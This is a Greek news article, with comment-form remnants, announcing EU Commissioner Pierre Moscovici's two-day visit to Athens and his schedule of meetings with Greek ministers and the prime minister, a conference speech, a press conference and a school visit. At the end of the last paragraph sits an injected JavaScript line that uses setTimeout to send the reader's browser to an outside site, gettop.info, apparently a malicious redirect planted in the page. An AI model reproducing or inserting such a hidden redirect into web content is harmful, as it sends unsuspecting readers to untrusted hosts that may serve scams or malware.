Στις 28 και 29 Νοεμβρίου ο Μοσκοβισί στην Αθήνα

0
8

 

Σειρά συναντήσεων με τους Τσίπρα, Τσακαλώτο, Αχτσιόγλου και Παπαδημητρίου θα έχει ο Επίτροπος Οικονομικών και Δημοσιονομικών Υποθέσεων Πιερ Μοσκοβισί κατά τη διήμερη επίσκεψή του στην Αθήνα.

Ο Επίτροπος θα βρεθεί στην Ελλάδα στις 28 και 29 Νοεμβρίου, όπου ξεκινά πρόγραμμα επαφών. Στις 15:00 θα συναντηθεί με τον υπουργό Οικονομίας και Ανάπτυξης Δήμο Παπαδημητρίου, στις 17.00 με τον πρωθυπουργό Αλέξη Τσίπρα στις 17:00 στο Μέγαρο Μαξίμου, στις 18:15 με τον υπουργό Οικονομικών Ευκλείδη Τσακαλώτο.

Το βράδυ θα εκφωνήσει κεντρική ομιλία, κατά τη διάρκεια δείπνου, στο Συνέδριο «THE GREEK ECONOMY CONFERENCE» που διοργανώνεται από το Ελληνο-Αμερικανικό Επιμελητήριο (ώρα 20:30, ξενοδοχείο «Athenaeum Intercontinental»).

Την επόμενη ημέρα, στις 29 Νοεμβρίου, ο Πιερ Μοσκοβισί θα συμμετάσχει σε πρόγευμα εργασίας με τον πρόεδρο και τα μέλη του ΔΣ του ΣΕΒ και αμέσως μετά, στις 10.15, θα συναντηθεί με την υπουργό Εργασίας, Κοινωνικής Ασφάλισης και Κοινωνικής Αλληλεγγύης, Έφη Αχτσιόγλου.

Θα ακολουθήσει στις 11.15 συνέντευξη Τύπου του Επιτρόπου στα γραφεία της αντιπροσωπείας της ΕΕ στην Ελλάδα.

Το πρόγραμμα του κ. Μοσκοβισί στην Αθήνα θα ολοκληρωθεί με επίσκεψη που θα πραγματοποιήσει στο 7ο Δημοτικό Σχολείο του δήμου Γέρακα (ώρα 14.00, Αισώπου 11Β, Γέρακας), πρότυπο έργου ΣΔΙΤ (Σύμπραξη Δημοσίου & Ιδιωτικού Τομέα), που συγχρηματοδοτείται από την ΕΕ (πρόγραμμα Jessica). setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here